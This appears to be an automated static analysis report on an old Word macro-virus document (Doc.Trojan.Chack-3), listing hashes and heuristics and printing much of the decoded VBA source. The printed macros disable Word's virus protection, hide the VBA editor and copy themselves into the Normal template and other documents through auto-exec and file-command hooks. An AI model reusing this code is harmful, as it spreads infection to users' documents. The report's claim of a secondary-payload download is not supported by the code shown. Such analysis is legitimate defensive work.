Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7429500e5becc6b3…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 55.0 KB
Created: 1999-10-18 10:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c2053e1a3a8470152b98bf1b0a94b37b
SHA-1: 1f60c2147c51edf6781a7f50f8fe2acc6fa26c9c
SHA-256: 7429500e5becc6b34441a905fc356206badef02597054ff27e47d9afe4d7e18c
Risk score: 340

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, flagged by multiple high-severity heuristics including OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC. The AutoOpen macro is present and configured to execute a shell command. The script itself contains obfuscated code and a contact email address, 'SuperXtar@Usa.Net', suggesting it is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Chack-3' further confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Trojan.Chack-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Chack-3
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24438 bytes
SHA-256: cf6b91cc948d55e47eaf945ba66fa673c8219d003a66f73fd00f5219b1ae9517
Detection: ClamAV: Doc.Trojan.Chack-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Jiuster"
'Do not modify anything, you will cause errors. Regards, Jiuster  SuperXtar@Usa.Net
'If you want to learn, contact me via e-mail
'Lamers like you, abstain
Public Jiustea1
Public Jiustea
Public Jiustez
Sub Seli()
    Jiustex = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Idat
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
     On Error GoTo 0
End Sub
Sub HolaIDAT()
Application.DisplayAlerts = Jiustex
End Sub
Sub Experto()
    On Error GoTo Jiu2
    Jiustea1 = 0
    Jiustez = False
    Set Ad = ActiveDocument
    Set NT = NormalTemplate
       If Jiustez = False Then
      On Error GoTo Jit2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=Ad.FullName, Name:= _
          "Jiuster", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=Ad.FullName, Name:= _
          "Jiuster4", Object:=wdOrganizerObjectProjectItems
      Jiustea1 = 1
Jit2:
    End If
Jiu2:
End Sub
Sub JiusterSoft()
    Call Idat
    On Error GoTo Jiu1
    Jiustea = False
    Set Ad = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Jit1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
    Next i
Jit1a:
    If Jiustea = False Then
      On Error GoTo Jit1
      Application.OrganizerCopy Source:=Ad.FullName, _
          Destination:=NT.FullName, Name:= _
          "Jiuster", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=Ad.FullName, _
          Destination:=NT.FullName, Name:= _
          "Jiuster4", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Jit1:
    End If
Jiu1:
End Sub
Sub LOMAXIMO()
    Call Seli
    Call JiusterSoft
    Call HolaIDAT
End Sub
Sub Idat()
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
End Sub
Sub Hacker()
    On Error GoTo Jit4
Set Ad = ActiveDocument
    If Jiustea1 = 1 Then
       Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument
    End If
Jit4:
End Sub
Sub AutoOpen()
    Call LOMAXIMO
End Sub
Sub AutoClose()
    Call Seli
    Call JiusterSoft
   Call Experto
    Call HolaIDAT
    ActiveDocument.SaveAs
    Call LOMAXIMO
 End Sub
Sub FileClose()
    Call Seli
    Call JiusterSoft
    Call Experto
    Call HolaIDAT
   ActiveDocument.SaveAs
   Call LOMAXIMO
   End Sub
Sub FileOpen()
    Call LOMAXIMO
    Dialogs(wdDialogFileOpen).Show
    Call Seli
    Call Experto
    Call Hacker
    Call HolaIDAT
End Sub
Sub FileSaveAs()
    Call Seli
    Call JiusterSoft
    Call Experto
    Call HolaIDAT
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub HelpAbout()
    On Error GoTo Jiu3
      Jiuster4.Show
Jiu3:
Call LOMAXIMO
End Sub

Sub HerramMacro()
    On Error GoTo Jiu3
    Jiuster4.Show
Application.OnTime Now + TimeValue("00:30:00"), "JiusVisual"
Jiu3:
    Call LOMAXIMO
End Sub

Sub FileExit()
    Call Seli
    Call JiusterSoft
    Call Experto
    On Error GoTo Jiu4
    If WeekDay(Date) = 5 Then Jiuster4.Show
Jiu4:
    Call HolaIDAT
    WordBasic.FileExit
End Sub
Sub ToolsOptions()
    Dialogs(wdDialogToolsOptions).Show
    Call LOMAXIMO
End Sub
Sub FileNew()
    Call LOMAXIMO
    Dialogs(wdDialogFileNew).Show
End Sub
Sub FileTemplates()
On Error Resume Next
Call LOMAXIMO
End Sub
Sub ToolsCustomize()
On Error Resume Next
... (truncated)